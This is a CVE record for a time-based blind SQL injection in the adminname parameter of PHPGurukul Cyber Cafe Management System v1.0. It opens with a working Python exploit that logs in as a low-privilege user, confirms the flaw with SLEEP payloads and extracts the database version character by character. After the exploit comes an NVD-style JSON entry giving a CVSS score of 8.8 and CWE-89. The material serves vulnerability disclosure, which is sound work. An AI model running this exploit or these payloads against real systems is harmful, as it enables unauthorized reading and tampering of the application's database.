CVE-2025-70893

import requests import time target_url = "http://target.com/adminprofile.php" login_url = "http://target.com/login.php" # Login with low-privilege account session = requests.Session() login_data = { 'username': 'attacker', 'password': 'password123' } session.post(login_url, data=login_data) # Time-based blind SQL injection test def test_sql_injection(): # Basic test - if sleep works, vulnerability exists test_payload = "admin' AND (SELECT SLEEP(5)) AND '1'='1" data = {'adminname': test_payload} start_time = time.time() response = session.post(target_url, data=data) elapsed = time.time() - start_time if elapsed >= 5: print("[+] Vulnerability confirmed - time-based SQL injection works") return True return False # Extract database version using time-based technique def extract_db_version(): version = "" charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-" for pos in range(1, 50): for char in charset: payload = f"admin' AND IF(SUBSTRING(@@version,{pos},1)='{char}',SLEEP(3),0) AND '1'='1" data = {'adminname': payload} start_time = time.time() session.post(target_url, data=data) elapsed = time.time() - start_time if elapsed >= 3: version += char print(f"[+] Extracted: {version}") break return version if __name__ == "__main__": if test_sql_injection(): print("[*] Extracting database version...") version = extract_db_version() print(f"[*] Database version: {version}")

{"cve": {"id": "CVE-2025-70893", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.117", "lastModified": "2026-01-22T16:00:26.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A time-based blind SQL Injection vulnerability exists in PHPGurukul Cyber Cafe Management System v1.0 within the adminprofile.php endpoint. The application fails to properly sanitize user-supplied input provided via the adminname parameter, allowing authenticated attackers to inject arbitrary SQL expressions."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL ciega basada en tiempo existe en PHPGurukul Cyber Cafe Management System v1.0 dentro del endpoint adminprofile.php. La aplicación no logra sanear correctamente la entrada proporcionada por el usuario a través del parámetro adminname, permitiendo a atacantes autenticados inyectar expresiones SQL arbitrarias."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "076A2810-A876-4B7D-B728-BCCE977A7225"}]}]}], "references": [{"url": "https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70893", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/", "source": "[email protected]", "tags": ["Product"]}]}}